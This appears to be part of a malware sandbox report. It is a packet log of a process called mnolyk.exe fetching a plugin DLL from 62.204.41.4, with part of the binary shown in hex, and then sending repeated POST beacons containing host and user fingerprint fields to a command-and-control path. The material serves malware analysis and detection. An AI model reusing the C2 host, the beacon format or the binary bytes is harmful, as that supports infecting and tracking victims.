                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.74969662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:01.356877089 CET10OUTGET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                                                                      Host: 62.204.41.4
                                                                      Feb 7, 2023 23:07:01.419603109 CET12INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:01 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 91136
                                                                      Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                                                                      Connection: keep-alive
                                                                      ETag: "63dd4219-16400"
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B
                                                                      Feb 7, 2023 23:07:01.419640064 CET13INData Raw: 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff
                                                                      Data Ascii: j h<ph?#h*Yj8h<h#h`l*Yj8h<h"hL*Yj8h<h"h ,*Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i
                                                                      Feb 7, 2023 23:07:01.419676065 CET15INData Raw: 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08
                                                                      Data Ascii: }ECEt'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E
                                                                      Feb 7, 2023 23:07:01.419709921 CET16INData Raw: 23 52 51 e8 31 1d 00 00 83 c4 08 33 f6 e9 74 ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50
                                                                      Data Ascii: #RQ13tRQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQ
                                                                      Feb 7, 2023 23:07:01.419744015 CET17INData Raw: 10 72 2d 8b 4c 24 40 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83
                                                                      Data Ascii: r-L$@BrI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP
                                                                      Feb 7, 2023 23:07:01.419779062 CET19INData Raw: 00 00 8a 41 02 3a 42 02 75 0f 83 7c 24 1c ff 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24
                                                                      Data Ascii: A:Bu|$t{A:Bts%snD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu81u|$0D$|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`B
                                                                      Feb 7, 2023 23:07:01.419814110 CET20INData Raw: 6c 8b c7 83 e8 04 89 44 24 1c 72 19 8b 01 3b 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00
                                                                      Data Ascii: lD$r;uD$D$s:u9|$A:Bu&|$A:Bu|$A:Bt~GwvD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu0xf90u|$0D$|$0L$@T$T
                                                                      Feb 7, 2023 23:07:01.419850111 CET21INData Raw: fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00
                                                                      Data Ascii: rI#+RQ|$thi5t$t$0hiL$xWxr|$4L$ CL$ ;xudD$r;uD$D$s:u1|$A:Bu|$tzA:Bu|$tkA:Btc_u^
                                                                      Feb 7, 2023 23:07:01.419883013 CET23INData Raw: 0e 50 57 51 e8 41 1d 00 00 8b 45 08 83 c4 0c 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8
                                                                      Data Ascii: PWQAEF^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^
                                                                      Feb 7, 2023 23:07:01.419918060 CET24INData Raw: 00 50 e8 bc 2e 00 00 59 85 c0 74 03 32 c0 c3 e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55
                                                                      Data Ascii: P.Yt20jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=
                                                                      Feb 7, 2023 23:07:01.482530117 CET26INData Raw: 00 00 00 53 57 ff 75 08 e8 b1 f8 ff ff 8b f0 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85
                                                                      Data Ascii: SWuuu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      20192.168.2.74971462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:06.440543890 CET124OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.505444050 CET124INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      200192.168.2.74989562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:53.534084082 CET315OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:53.597876072 CET315INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      201192.168.2.74989662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:53.775433064 CET316OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:53.839123011 CET316INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      202192.168.2.74989762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:54.022407055 CET317OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:54.087541103 CET317INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      203192.168.2.74989862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:54.273097038 CET318OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:54.336081028 CET318INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      204192.168.2.74989962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:54.525688887 CET319OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:54.588591099 CET319INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      205192.168.2.74990062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:54.774755001 CET320OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:54.838352919 CET320INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      206192.168.2.74990162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:55.355595112 CET321OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:55.425688982 CET321INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      207192.168.2.74990262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:55.670942068 CET322OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:55.736519098 CET322INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      208192.168.2.74990362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:56.006891012 CET323OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:56.071557999 CET323INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      209192.168.2.74990462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:57.181548119 CET324OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:57.245490074 CET324INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      21192.168.2.74971562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:06.670721054 CET125OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
